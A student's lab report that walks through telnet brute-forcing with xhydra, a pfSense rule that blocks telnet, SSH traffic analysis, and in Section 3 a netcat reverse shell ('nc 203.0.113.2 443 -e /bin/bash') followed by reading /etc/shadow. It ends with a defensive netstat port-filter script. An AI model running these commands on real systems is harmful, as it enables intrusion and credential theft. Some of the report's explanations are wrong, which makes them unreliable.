
Stephen Dick

CVF1083

1/30/18

Lab 3

Task 1: connect linux using telnet

1. Went to the top left, clicked on the blue onion icon > security onion > wireshark at the bottom and opened it.

2. Navigated to capture > then opened interfaces and clicked start on eth0.

Wireshark has started to scan for packets.

3. (Kali linux version here)

Navigated to the top bar and opened the terminal. Ran the command ifconfig to see the addresses associated.

4. Ran the command nmap -p 23 192.168.1.0/24 to scan port 23 for any open subnets within the port.

5. Used the telnet command and couldn’t get a connection between the machines.

6. Used xhydra command in the kali terminal and changed the ip to 192.168.1.50 and the protocol to telnet.

7. Typed xhydra in the terminal in kali, and changed the username to student.

Then selected the password list, filling it with /tmp/wordlists/passlist.

8. Started the password cracking, and this showed up, unsure of what I have done wrong with the setup.

Task 1.2 Analyzing telnet

1. Telnetted the ip 192.168.1.50

Wasn’t presented, it was failed, unsure why.

Task 1.3 setting up pfsense

Logged into pfsense in the security onion

2. Selected the firewall>rules and selected add more.

3. Set action > Reject

Set interface > external GW

Protocol > TCP

Source type > external gw net

4. Set the destination to internal gw net

Set the dest port range to and from telnet 23 and saved all the settings.

5. After accepting the settings, I was shown a warning and I applied the changes.

6. Was denied due to the firewall network

Ports were closed on the telnet

Task 2.1 analyzing ssh

1. Typed ifconfig to check the ip status

2. Started wireshark on the security onion for eth0 scan.

3. Typed the command ssh student 192.168.1.50 and used securepassword as the password

4. Went to the security onion and typed ssh in the filter, found out there was a key exchange over the network.

5. Checked packet 6 and looked at the tcp stream

6. Key presented after checking the tcp stream

7. Used the command netstat -tan | grep 22 to check the port status of 22

8. Used the command pwd to check my current location in the directory.

9. Used the command ls to check the list of files in the directory.

10. Used the command ls -a to check all files in the directory

11. Used the command sudo su and used the password securepassword to gain access to the root of the root machine.

12. Used the command useradd admin1 to create the account admin1 on the ubuntu machine

13. Used the command cat /etc/shadow | grep admin1 to check the ipv6 of admin1

14. Used the command service proftpd status to check the tpd status of ubuntu, I then exited the ssh connection

Section 3 connecting to a linux system by using netcat

3.1 using netcat to send a reverse shell

1. Used the command nc -l -p 443 to listen to traffic over port 443 (https)

2. Used the command netstat -tan | grep 443 to check the status of port 443

3. Used the command nc 203.0.113.2 443 -e /bin/bash to send shells to port 443 on linux

4. Used the command uname -a as the 443 port was listening.

5. Used the command ifconfig to check my network interfaces as the security onion

6. Typed whoami in the terminal, and I am the security onion.

7. There was no output; I need privileges.

8. Used the command echo mypassword | sudo -S cat /etc/shadow to see the contents of the folder

9. Used the command netstat -tan | grep 443 to see the connections on port 443.
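
The netstat -tan | grep 22 and netstat -tan | grep 443 checks used in this lab match any row that merely contains those digits (an address ending in .22, port 2222, port 44322). The shell function below is an added example, not part of the original lab report, that filters netstat -tan output by exact port and prints the connection state; the function names and the sample rows are constructed for illustration.

```shell
#!/bin/sh
# Added example: exact-port filter for `netstat -tan` output.
# Reads netstat text on stdin and prints "STATE LOCAL REMOTE" for every
# TCP row whose local or remote port equals $1 exactly.
conns_on_port() {
    awk -v port="$1" '
        $1 ~ /^tcp/ {
            # The port is whatever follows the last ":" (IPv4 and IPv6 rows).
            lp = $4; sub(/.*:/, "", lp)
            rp = $5; sub(/.*:/, "", rp)
            if (lp == port || rp == port) print $6, $4, $5
        }'
}

# Constructed sample of `netstat -tan` output (not captured from the lab).
# It contains look-alike rows that a plain grep would also match.
sample_netstat() {
    cat <<'EOF'
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 203.0.113.2:443         192.0.2.10:44322        ESTABLISHED
tcp        0      0 192.168.1.22:8080       192.168.1.10:51000      ESTABLISHED
tcp        0      0 192.168.1.10:2222       192.168.1.50:40443      TIME_WAIT
tcp6       0      0 :::22                   :::*                    LISTEN
EOF
}

# Demo: only the real port-443 session is reported, with its state.
sample_netstat | conns_on_port 443
```

On a live host the same function reads real output: netstat -tan | conns_on_port 443. An ESTABLISHED row on 443 that belongs to no web server or browser process is worth a closer look.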
